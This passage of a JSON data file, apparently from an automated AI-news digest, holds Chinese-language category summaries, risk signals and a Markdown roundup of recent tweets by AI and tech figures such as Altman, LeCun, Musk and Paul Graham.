"https://x.com/Cursor/status/2047744579127185843" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "AI编程工具实测", + "subtitle": "Cursor + Claude Code 工作流", + "level": "P0", + "items": [ + { + "text": "Claude Blender MCP一句话操控3D场景", + "url": "https://x.com//status/2049403423813140571" + } + ] + }, + { + "id": "c2", + "title": "开源模型生态", + "subtitle": "多模态与Agent专用", + "level": "P0", + "items": [ + { + "text": "前GitHub CTO团队开源Laguna 33B MoE", + "url": "https://x.com//status/2049250710492160228" + }, + { + "text": "Moonshot Kimi k2.6成开源SOTA", + "url": "https://x.com//status/2047145172337836139" + } + ] + }, + { + "id": "c3", + "title": "国产模型与Token补贴", + "subtitle": "中文开发者福利", + "level": "P1", + "items": [ + { + "text": "小米百万亿token补贴到账7亿", + "url": "https://x.com//status/2049296454905393361" + }, + { + "text": "罗福莉团队100T tokens grant开放申请", + "url": "https://x.com//status/2049402305217241384" + } + ] + }, + { + "id": "c4", + "title": "AI编程学习资源", + "subtitle": "Skill框架与实操教程", + "level": "P1", + "items": [ + { + "text": "Matt Pocock开源38K stars的Skill框架", + "url": "https://x.com//status/2049339826877665496" + } + ] + }, + { + "id": "c5", + "title": "宏观与市场信号", + "subtitle": "能源与房产", + "level": "P2", + "items": [ + { + "text": "伊朗战争以来:航空燃油+70%、布伦特原油+52%、尿素+48%", + "url": "https://x.com//status/2049298490489004357" + }, + { + "text": "美国房价年增0.7%创2023年6月以来最慢,卖家数量创纪录高出买家46%", + "url": "https://x.com//status/2049306480071873011" + } + ] + }, + { + "id": "c6", + "title": "新终端与开发工具", + "subtitle": "Warp开源 + 垂直Tab", + "level": "P1", + "items": [ + { + "text": "Warp正式开源,重大转折点", + "url": "https://x.com//status/2049304499093946479" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "Claude Code系统提示Bug:托管Agent失效+用户token被空转烧光", + "detail": "托管Agent因系统提示问题失效,用户token被空转消耗,需密切关注官方修复进展" + }, + { + "id": "r2", + "level": "MID", + "title": "Anthropic拒接军方合作,Google签下五角大楼新合同", + "detail": "AI公司军事合作态度分化,Google趁机填补空缺,可能影响未来AI安全叙事" + }, + { + "id": "r3", + "level": "OPP", + "title": "AI项目严重长尾:54%项目零star,Top1%占83% stars", + "detail": "开源AI agent项目严重分布不均,大部分项目缺乏曝光,生态存在价值发现难题" + }, + { + "id": "r4", + "level": "MID", + "title": "VC退出路径收窄:IPO门槛$500M revenue", + "detail": "Harry Stebbings指出当前VC退出选项受限,IPO需$500M revenue才能进行,并购条件愈发苛刻" + }, + { + "id": "r5", + "level": "MID", + "title": "SBC稀释风险:股价下跌时3%年化稀释可飙至10%", + "detail": "股权补偿在股价下跌时稀释爆炸,Harry Stebbings警告下行螺旋风险" + }, + { + "id": "r6", + "level": "OPP", + "title": "美国房价将迎来调整", + "detail": "Charlie Bilello:房价年增0.7%创新低,卖家数量创纪录高出买家46%,无政府干预房价将下行" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-04-29T09:15:14.394459+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近7天\n**账号总数**: 44 | **成功获取**: 37 | **推文总数**: 513\n\n---\n\n### ✅ @karpathy — Andrej Karpathy(2 条)\n\n**[2026-04-27T21:34:34+00:00]**\n> RT by @karpathy: New work with @AlecRad and @DavidDuvenaud: Have you ever dreamed of talking to someone from the past? Introducing talkie, a 13B model trained only on pre-1931 text. Vintage models sh…\n[原文链接](https://x.com/karpathy/status/2048878495539843211)\n\n**[2026-04-22T16:00:05+00:00]**\n> RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see. @eddiejiao_obj, @drewocarr and I built…\n[原文链接](https://x.com/karpathy/status/2046982383430496444)\n\n---\n\n### ✅ @sama — Sam Altman(20 条)\n\n**[2026-04-29T02:31:21+00:00]**\n> R to @sama: at this point @ajambrosino is mogmogging enjoy the next few updates\n[原文链接](https://x.com/sama/status/2049315574120055054)\n\n**[2026-04-29T02:27:13+00:00]**\n> Image\n[原文链接](https://x.com/sama/status/2049314532892475791)\n\n**[2026-04-28T21:37:05+00:00]**\n> Image\n[原文链接](https://x.com/sama/status/2049241518540808440)\n\n**[2026-04-28T21:12:19+00:00]**\n> wow y'all love 5.5 we should think of something nice to do to celebrate!\n[原文链接](https://x.com/sama/status/2049235284655780000)\n\n**[2026-04-28T05:28:43+00:00]**\n> RT by @sama: Don't just reset Codex rate limits for fun, it costs money. Don't just reset Codex rate limits for fun, it costs money. ... but the vibes are good ... I have reset Codex rate limits for …\n[原文链接](https://x.com/sama/status/2048997818673537399)\n\n**[2026-04-28T02:52:46+00:00]**\n> RT by @sama: We will ship again this week. Codex has achieved escape velocity and will keep improving rapidly.\n[原文链接](https://x.com/sama/status/2048958572562710550)\n\n**[2026-04-27T23:55:12+00:00]**\n> codex with the $20 plan is a really good deal\n[原文链接](https://x.com/sama/status/2048913887614115857)\n\n**[2026-04-27T23:42:41+00:00]**\n> we love our users\n[原文链接](https://x.com/sama/status/2048910739784826966)\n\n**[2026-04-27T13:24:26+00:00]**\n> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr…\n[原文链接](https://x.com/sama/status/2048755148361707946)\n\n**[2026-04-27T13:09:30+00:00]**\n> this is so good: https://paulgraham.com/kids.html\n[原文链接](https://x.com/sama/status/2048751392031203544)\n\n**[2026-04-27T00:05:31+00:00]**\n> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful.\n[原文链接](https://x.com/sama/status/2048554097985593849)\n\n**[2026-04-26T23:59:53+00:00]**\n> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/\n[原文链接](https://x.com/sama/status/2048552677433643427)\n\n**[2026-04-26T15:46:41+00:00]**\n> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)\n[原文链接](https://x.com/sama/status/2048428561481265539)\n\n**[2026-04-26T15:37:00+00:00]**\n> \"post-AGI, no one is going to work and the economy is going to collapse\" \"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret…\n[原文链接](https://x.com/sama/status/2048426122854228141)\n\n**[2026-04-26T02:15:19+00:00]**\n> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day\n[原文链接](https://x.com/sama/status/2048224374264885396)\n\n**[2026-04-25T22:20:08+00:00]**\n> how can they write code so fast?!\n[原文链接](https://x.com/sama/status/2048165186482389253)\n\n**[2026-04-25T22:01:18+00:00]**\n> R to @sama: (and we will fix the former)\n[原文链接](https://x.com/sama/status/2048160448340767038)\n\n**[2026-04-25T22:01:08+00:00]**\n> we still get looksmaxxed on frontend a little but we IQmog hard now\n[原文链接](https://x.com/sama/status/2048160404376105179)\n\n**[2026-04-25T15:31:08+00:00]**\n> 5.5 is so earnest \"little engine that could\" energy\n[原文链接](https://x.com/sama/status/2048062261584077149)\n\n**[2026-04-24T23:41:49+00:00]**\n> this was a good week. proud of the team. happy building!\n[原文链接](https://x.com/sama/status/2047823357635354814)\n\n---\n\n### ✅ @DarioAmodei — Dario Amodei(0 条)\n\n---\n\n### ✅ @AravSrinivas — Aravind Srinivas(9 条)\n\n**[2026-04-28T16:05:11+00:00]**\n> RT by @AravSrinivas: Today we’re rolling out a new native Comet experience for iPad. Comet now works naturally with iPadOS features like multiple windows and Split View, so you can work with Comet al…\n[原文链接](https://x.com/AravSrinivas/status/2049157990604025896)\n\n**[2026-04-28T15:38:49+00:00]**\n> R to @AravSrinivas: reddit.com/r/GeminiAI/commen…\n[原文链接](https://x.com/AravSrinivas/status/2049151356985040934)\n\n**[2026-04-28T15:38:28+00:00]**\n> A Google Earth + Flight Simulator, fully cooked by Perplexity Computer with Codex/CC as subagents inside it. GTA vibes.\n[原文链接](https://x.com/AravSrinivas/status/2049151268606894310)\n\n**[2026-04-24T21:24:24+00:00]**\n> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr…\n[原文链接](https://x.com/AravSrinivas/status/2047788775468908840)\n\n**[2026-04-24T19:03:21+00:00]**\n> We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know y…\n[原文链接](https://x.com/AravSrinivas/status/2047753276888854595)\n\n**[2026-04-24T18:44:19+00:00]**\n> RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers. GPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers.\n[原文链接](https://x.com/AravSrinivas/status/2047748486767272243)\n\n**[2026-04-23T02:46:57+00:00]**\n> RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers.\n[原文链接](https://x.com/AravSrinivas/status/2047145172337836139)\n\n**[2026-04-22T18:28:20+00:00]**\n> We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. Unlike our previous post trained models, this model has been trained to be good at search and tool c…\n[原文链接](https://x.com/AravSrinivas/status/2047019688920756504)\n\n**[2026-04-22T18:15:16+00:00]**\n> RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers. Our SFT + RL pipeline improves search, citation quality, instruction following, an…\n[原文链接](https://x.com/AravSrinivas/status/2047016400292839808)\n\n---\n\n### ✅ @AndrewYNg — Andrew Ng(1 条)\n\n**[2026-04-27T15:58:13+00:00]**\n> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to…\n[原文链接](https://x.com/AndrewYNg/status/2048793852702757151)\n\n---\n\n### ✅ @cursor_ai — Cursor(7 条)\n\n**[2026-04-24T19:48:34+00:00]**\n> R to @cursor_ai: Download Cursor 3.2 to try these new features in the agents window: http://cursor.com/download\n[原文链接](https://x.com/cursor_ai/status/2047764656165646786)\n\n**[2026-04-24T19:48:33+00:00]**\n> Introducing /multitask in the new Cursor 3 interface. Cursor can now run async subagents to parallelize your requests instead of adding them to the queue. For already queued messages, you can ask Cur…\n[原文链接](https://x.com/cursor_ai/status/2047764651363180839)\n\n**[2026-04-24T19:48:33+00:00]**\n> R to @cursor_ai: We've also added multi-root workspaces for cross-repo changes. A single agent session can now target a reusable workspace made of multiple folders.\n[原文链接](https://x.com/cursor_ai/status/2047764654760632725)\n\n**[2026-04-24T18:28:47+00:00]**\n> GPT-5.5 is now available in Cursor! It's currently the top model on CursorBench at 72.8%. We've partnered with OpenAI to offer it for 50% off through May 2.\n[原文链接](https://x.com/cursor_ai/status/2047744579127185843)\n\n**[2026-04-24T18:28:47+00:00]**\n> R to @cursor_ai: More on CursorBench: http://cursor.com/blog/cursorbench\n[原文链接](https://x.com/cursor_ai/status/2047744580280561948)\n\n**[2026-04-22T17:12:09+00:00]**\n> Mention @​Cursor to kick off tasks in Slack and see updates of its work streaming in real time. Cursor uses context in the thread and broader channels to create a PR for you to review and ship.\n[原文链接](https://x.com/cursor_ai/status/2047000517751288303)\n\n**[2026-04-22T17:12:09+00:00]**\n> R to @cursor_ai: Add Cursor to Slack: http://cursor.com/api/install-slack-app\n[原文链接](https://x.com/cursor_ai/status/2047000519043141766)\n\n---\n\n### ✅ @ylecun — Yann LeCun(20 条)\n\n**[2026-04-28T21:36:28+00:00]**\n> RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 ! As my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers: - EB-JEPA https://github…\n[原文链接](https://x.com/ylecun/status/2049241361266684288)\n\n**[2026-04-28T01:05:42+00:00]**\n> RT by @ylecun: The EPA's independent science arm did groundbreaking research to save lives. It studied fertility, asthma, wildfires, drinking water, climate change etc etc In just one year, it has be…\n[原文链接](https://x.com/ylecun/status/2048931628995510596)\n\n**[2026-04-27T21:38:46+00:00]**\n> RT by @ylecun: “Calling Trump a fascist incites political violence” Here’s a compilation of Trump calling his opponents fascists\n[原文链接](https://x.com/ylecun/status/2048879552022130882)\n\n**[2026-04-27T21:06:29+00:00]**\n> RT by @ylecun: He is right\n[原文链接](https://x.com/ylecun/status/2048871429681148028)\n\n**[2026-04-27T14:59:33+00:00]**\n> RT by @ylecun: By canning the National Science Board with no stated justification, the administration continues the destruction of this country's scientific and technological base built up over 80 ye…\n[原文链接](https://x.com/ylecun/status/2048779086168838610)\n\n**[2026-04-27T12:27:04+00:00]**\n> RT by @ylecun: The 2020 US election was audited on a massive scale. Researchers examined audit results from 856 jurisdictions across 27 states, covering over 71 million votes. The audits found the ne…\n[原文链接](https://x.com/ylecun/status/2048740712556933170)\n\n**[2026-04-27T10:23:22+00:00]**\n> RT by @ylecun: AI has had one safest technology roll-outs in history. Read that again, because it's a fact. It's used by billions with a tiny fraction of a percent of actual problems. And yet it's se…\n[原文链接](https://x.com/ylecun/status/2048709585360367651)\n\n**[2026-04-27T06:49:24+00:00]**\n> RT by @ylecun: Image\n[原文链接](https://x.com/ylecun/status/2048655735412650355)\n\n**[2026-04-26T23:40:02+00:00]**\n> RT by @ylecun: 👉 Sur l’#IA, mon optimisme est prudent. Je reconnais les dangers de cette technologie, mais si on en freinait le développement en Europe, au nom du principe de précaution, son essor au…\n[原文链接](https://x.com/ylecun/status/2048547683112046771)\n\n**[2026-04-26T19:19:22+00:00]**\n> RT by @ylecun: Trump has spent the better years of his second term treating allied governments like freeloading tenants who should be grateful he hasn’t changed the locks. The result, predictably, is…\n[原文链接](https://x.com/ylecun/status/2048482084646240560)\n\n**[2026-04-26T18:31:11+00:00]**\n> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,…\n[原文链接](https://x.com/ylecun/status/2048469956627468510)\n\n**[2026-04-26T17:27:23+00:00]**\n> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is …\n[原文链接](https://x.com/ylecun/status/2048453901930660058)\n\n**[2026-04-26T16:08:11+00:00]**\n> RT by @ylecun: What if I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? Hell no, right? But the answer is actuall…\n[原文链接](https://x.com/ylecun/status/2048433973177573559)\n\n**[2026-04-26T16:03:04+00:00]**\n> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for…\n[原文链接](https://x.com/ylecun/status/2048432684930654430)\n\n**[2026-04-26T13:51:41+00:00]**\n> Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex.\n[原文链接](https://x.com/ylecun/status/2048399621492236615)\n\n**[2026-04-26T06:48:29+00:00]**\n> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an…\n[原文链接](https://x.com/ylecun/status/2048293118781296734)\n\n**[2026-04-25T19:15:22+00:00]**\n> RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5…\n[原文链接](https://x.com/ylecun/status/2048118689258487857)\n\n**[2026-04-25T16:01:07+00:00]**\n> RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN…\n[原文链接](https://x.com/ylecun/status/2048069805807128734)\n\n**[2026-04-24T14:14:06+00:00]**\n> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their…\n[原文链接](https://x.com/ylecun/status/2047680485208531152)\n\n**[2026-04-24T13:58:49+00:00]**\n> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also …\n[原文链接](https://x.com/ylecun/status/2047676640059154653)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(9 条)\n\n**[2026-04-28T20:16:21+00:00]**\n> Google Translate is turning 20! 🎉. There are 20 fun facts and tips in the thread below. Translate is one of my favorite Google products because it brings us all closer together! I've been involved wi…\n[原文链接](https://x.com/JeffDean/status/2049221200321380805)\n\n**[2026-04-27T13:40:08+00:00]**\n> The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conversation!\n[原文链接](https://x.com/JeffDean/status/2048759102390899142)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as the…\n[原文链接](https://x.com/JeffDean/status/2048351736037826877)\n\n**[2026-04-24T13:12:52+00:00]**\n> R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1\n[原文链接](https://x.com/JeffDean/status/2047665074471387456)\n\n**[2026-04-23T20:15:06+00:00]**\n> R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that …\n[原文链接](https://x.com/JeffDean/status/2047408945950802186)\n\n**[2026-04-23T20:09:30+00:00]**\n> R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computati…\n[原文链接](https://x.com/JeffDean/status/2047407537566495033)\n\n**[2026-04-23T20:00:58+00:00]**\n> R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput. The pod size is increased slightly to 9600 chips, and provides ~3X the FP4 perform…\n[原文链接](https://x.com/JeffDean/status/2047405389856297387)\n\n**[2026-04-23T19:55:08+00:00]**\n> I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert and @djrosent. The blog post announcement has lots of…\n[原文链接](https://x.com/JeffDean/status/2047403921912873257)\n\n**[2026-04-23T15:41:07+00:00]**\n> It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale tr…\n[原文链接](https://x.com/JeffDean/status/2047339995682529313)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(3 条)\n\n**[2026-04-28T13:25:24+00:00]**\n> Test of Time LLM from some legends...pretty fun!\n[原文链接](https://x.com/soumithchintala/status/2049117783447785523)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://x.com/soumithchintala/status/2048756358820827564)\n\n**[2026-04-23T05:52:02+00:00]**\n> RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓 They’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in…\n[原文链接](https://x.com/soumithchintala/status/2047191747793649805)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(16 条)\n\n**[2026-04-29T04:57:00+00:00]**\n> OpenAI may no longer be a nonprofit but it continues to be—and may always be—a “never made a profit”\n[原文链接](https://x.com/GaryMarcus/status/2049352224547975422)\n\n**[2026-04-29T03:10:50+00:00]**\n> RT by @GaryMarcus: Gary, that was a great article. Wonderful work as always sir. You have been proven accurate once again.\n[原文链接](https://x.com/GaryMarcus/status/2049325506764677608)\n\n**[2026-04-29T02:53:39+00:00]**\n> the ability of this man to sell things he doesn’t believe in is truly extraordinary\n[原文链接](https://x.com/GaryMarcus/status/2049321182089081059)\n\n**[2026-04-28T21:46:18+00:00]**\n> Wow. Musk’s lawyers will capitalize on this.\n[原文链接](https://x.com/GaryMarcus/status/2049243836359254025)\n\n**[2026-04-28T21:44:35+00:00]**\n> From what I can tell, Elon Musk just stepped on his own toes at the trial, making it all about him instead of the promises Altman and Brockman broke. OpenAI will slay his ego on cross. He should have…\n[原文链接](https://x.com/GaryMarcus/status/2049243406380237116)\n\n**[2026-04-28T21:06:51+00:00]**\n> RT by @GaryMarcus: As an avid cyclist, I was amused to see ChatGPT's “powerful new image engine\" draw a bicycle with the \"brake\" label pointing to empty space where brakes are sometimes found on othe…\n[原文链接](https://x.com/GaryMarcus/status/2049233910266278250)\n\n**[2026-04-28T19:01:24+00:00]**\n> Thoughtful book on LLMs and linguistics — by someone who actually knows linguistics.\n[原文链接](https://x.com/GaryMarcus/status/2049202338209079574)\n\n**[2026-04-28T17:00:41+00:00]**\n> Google, 2001: Don’t Be Evil Google, 2026: How much does mass surveillance pay?\n[原文链接](https://x.com/GaryMarcus/status/2049171957250207936)\n\n**[2026-04-28T16:37:04+00:00]**\n> RT by @GaryMarcus: They were saying that AI was going to enable time travel, and quite frankly, it truly did! It transported us all straight to 1984.\n[原文链接](https://x.com/GaryMarcus/status/2049166017138692254)\n\n**[2026-04-28T16:17:18+00:00]**\n> honestly, one of the worst things this nation has ever done to itself.\n[原文链接](https://x.com/GaryMarcus/status/2049161039665848492)\n\n**[2026-04-28T15:57:57+00:00]**\n> Talking AI with @MarioNawfal momentarily (9am PT; link info will be at his pinned tweet, or view on YouTube).\n[原文链接](https://x.com/GaryMarcus/status/2049156171463110746)\n\n**[2026-04-28T15:48:20+00:00]**\n> RT by @GaryMarcus: I spent the last 2 months trying to prevent this. If OpenAI offered a fig leaf, Google said \"imagine we offered a fig leaf.\" Google affirms it can't veto usage, commits to modify s…\n[原文链接](https://x.com/GaryMarcus/status/2049153749743264231)\n\n**[2026-04-28T12:31:48+00:00]**\n> ⚠️ Google’s Pentagon deal seems to allow for autonomous weapons and mass surveillance. ⚠️\n[原文链接](https://x.com/GaryMarcus/status/2049104294415409347)\n\n**[2026-04-28T06:25:14+00:00]**\n> RT by @GaryMarcus: The cracks inside OpenAI are deepening, and the numbers don’t lie. When your own CFO is sounding the alarm, something is seriously wrong. Check this out: 1: OpenAI missed its targe…\n[原文链接](https://x.com/GaryMarcus/status/2049012041164185701)\n\n**[2026-04-28T04:31:45+00:00]**\n> OpenAI, which squandered its tremendous lead and is now missing its projections, is in trouble. There’s no two ways about it.\n[原文链接](https://x.com/GaryMarcus/status/2048983482685440365)\n\n**[2026-04-28T04:05:40+00:00]**\n> When you project exponential growth – and miss. I stand by my call that OpenAI is likely to someday be seen as the WeWork of AI.\n[原文链接](https://x.com/GaryMarcus/status/2048976920629645554)\n\n---\n\n### ✅ @elonmusk — Elon Musk(20 条)\n\n**[2026-04-29T06:19:31+00:00]**\n> Cybertruck\n[原文链接](https://x.com/elonmusk/status/2049372990870290940)\n\n**[2026-04-29T06:05:35+00:00]**\n> Congrats!\n[原文链接](https://x.com/elonmusk/status/2049369485459832951)\n\n**[2026-04-29T06:04:42+00:00]**\n> RT by @elonmusk: Full circle moment: paying for @Starlink with @XMoney 🤝\n[原文链接](https://x.com/elonmusk/status/2049369264914903143)\n\n**[2026-04-29T05:57:10+00:00]**\n> RT by @elonmusk: Elon Musk on AI during the OpenAI trial: \"It (AI) could make us more prosperous, but it could also kill us all. We want to be in a Gene Roddenberry movie, like Star Trek, not so much…\n[原文链接](https://x.com/elonmusk/status/2049367366824305013)\n\n**[2026-04-29T03:37:16+00:00]**\n> RT by @elonmusk: The exact same question to Grok 4.3, GPT 5.5, and Claude Opus 4.7: “Count to 10 starting from 11” Grok 4.3 wins 🏆 Every single time It gave 11, 10 and explained why going backwards w…\n[原文链接](https://x.com/elonmusk/status/2049332159601942995)\n\n**[2026-04-29T01:55:58+00:00]**\n> RT by @elonmusk: #BREAKING: Chairman @Jim_Jordan invites Southern Poverty Law Center Interim CEO and President Bryan Fair to testify publicly on Wednesday, May 20, 2026, at 10:00 a.m.\n[原文链接](https://x.com/elonmusk/status/2049306669352358192)\n\n**[2026-04-29T01:16:51+00:00]**\n> RT by @elonmusk: Following future rollout of FSD V14 Lite for HW3 vehicles in the US, we plan on expanding V14 Lite to additional international markets. This update ensures that HW3 vehicle owners wi…\n[原文链接](https://x.com/elonmusk/status/2049296822162874685)\n\n**[2026-04-29T00:23:52+00:00]**\n> RT by @elonmusk: Ookla says @Starlink has been a game-changer for inflight Wi-Fi speeds. Their new report ranks which airline has the fastest Wi-Fi: \"Starlink stood out for its speed. Of over 50 airl…\n[原文链接](https://x.com/elonmusk/status/2049283488600277368)\n\n**[2026-04-29T00:09:36+00:00]**\n> RT by @elonmusk: Super high bandwidth to commercial aircraft with @Starlink\n[原文链接](https://x.com/elonmusk/status/2049279898976702535)\n\n**[2026-04-28T22:48:24+00:00]**\n> RT by @elonmusk: The California Coastal Commission has issued a formal apology to @elonmusk and SpaceX, adding that it will not consider political views or speech in future regulatory decisions. • Th…\n[原文链接](https://x.com/elonmusk/status/2049259466973933764)\n\n**[2026-04-28T15:39:42+00:00]**\n> RT by @elonmusk: Integrating Starlink with @TMobile’s 5G network will provide reliable, high-speed broadband for millions of businesses, including those in rural and remote locations across the count…\n[原文链接](https://x.com/elonmusk/status/2049151577597112419)\n\n**[2026-04-28T15:36:44+00:00]**\n> RT by @elonmusk: Actually Smart Summon now reacts a lot faster\n[原文链接](https://x.com/elonmusk/status/2049150833422647689)\n\n**[2026-04-28T06:20:07+00:00]**\n> 💯\n[原文链接](https://x.com/elonmusk/status/2049010754012209457)\n\n**[2026-04-28T05:08:03+00:00]**\n> RT by @elonmusk: To those who pit Sam Altman and Elon Musk against each other like a billionaire feud, look, do your own research. When have you ever seen Elon Musk use his money to buy a yacht, a pa…\n[原文链接](https://x.com/elonmusk/status/2048992619926106526)\n\n**[2026-04-28T04:39:42+00:00]**\n> RT by @elonmusk: South Korean reporter after experiencing @Tesla FSD (Supervised) in the country for the first time: \"It flawlessly performed all tasks, including obeying traffic signals, staying in …\n[原文链接](https://x.com/elonmusk/status/2048985482709676382)\n\n**[2026-04-28T04:20:02+00:00]**\n> RT by @elonmusk: Let me get this straight: > the top 1% earners in CA pay a cumulative $40-$50b/yr in income tax > yet CA Medicaid alone loses $50b/yr in fraud So, you can work your whole life to be …\n[原文链接](https://x.com/elonmusk/status/2048980534370410757)\n\n**[2026-04-28T03:28:16+00:00]**\n> RT by @elonmusk: 🇺🇸 Another deranged liberal openly disappointed Trump wasn’t assassinated. These people are actually upset he survived. What the hell is wrong with them?\n[原文链接](https://x.com/elonmusk/status/2048967507432681518)\n\n**[2026-04-28T01:03:02+00:00]**\n> RT by @elonmusk: Best ad for Grok imaginable. \"I can't manipulate this AI into lying to me.\"\n[原文链接](https://x.com/elonmusk/status/2048930958502482277)\n\n**[2026-04-27T23:03:05+00:00]**\n> RT by @elonmusk: All three of the liberal justices dissented from the order allowing Texas to use their new congressional map. But these same justices all voted with a unanimous court back in Februar…\n[原文链接](https://x.com/elonmusk/status/2048900774025986532)\n\n**[2026-04-27T14:04:14+00:00]**\n> RT by @elonmusk: When I wrote The New White Nationalism in America in 2002, there were roughly 2,000 KKK members left in the entire nation — and a large percentage were suspected paid informants. Rea…\n[原文链接](https://x.com/elonmusk/status/2048765165533868432)\n\n---\n\n### ✅ @paulg — Paul Graham(20 条)\n\n**[2026-04-29T03:42:31+00:00]**\n> RT by @paulg: MIT student asked a question earlier today that a lot of young founders are quietly wondering about: \"Won’t the frontier labs just do everything?\" Yes it's true that OAI/Ant are shippin…\n[原文链接](https://x.com/paulg/status/2049333482271260710)\n\n**[2026-04-29T03:29:10+00:00]**\n> RT by @paulg: What do the smartest kids in the world do when they grow up? I did the largest study of ~18,000 International Olympiad medalists (IMO, IOI and IPhO) over the last 25yrs, arguably the sh…\n[原文链接](https://x.com/paulg/status/2049330123464393084)\n\n**[2026-04-28T20:39:11+00:00]**\n> We're in Stockholm. You know how there are some places where you think \"Nice place to visit, but I wouldn't want to live there\"? Stockholm is the kind of place that makes you want to live there.\n[原文链接](https://x.com/paulg/status/2049226946471489602)\n\n**[2026-04-28T20:35:56+00:00]**\n> There are some real bombshells in this one.\n[原文链接](https://x.com/paulg/status/2049226128603172949)\n\n**[2026-04-28T20:32:16+00:00]**\n> \"He just doesn't listen to me. Just like you.\" — Jessica on our younger son\n[原文链接](https://x.com/paulg/status/2049225204132421727)\n\n**[2026-04-27T23:13:11+00:00]**\n> If you skip some or all of college to start a startup, it's on you to develop your mind the way college would have. And that's not something that happens by default in most startups.\n[原文链接](https://x.com/paulg/status/2048903314759196893)\n\n**[2026-04-27T10:01:28+00:00]**\n> One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n[原文链接](https://x.com/paulg/status/2048704073356935676)\n\n**[2026-04-27T09:50:40+00:00]**\n> You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.\n[原文链接](https://x.com/paulg/status/2048701354672050286)\n\n**[2026-04-27T08:17:48+00:00]**\n> Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.\n[原文链接](https://x.com/paulg/status/2048677984106664227)\n\n**[2026-04-27T04:08:42+00:00]**\n> RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France. My French friend of @Fundoraclu…\n[原文链接](https://x.com/paulg/status/2048615296613937201)\n\n**[2026-04-26T14:48:06+00:00]**\n> RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one. GPT 2 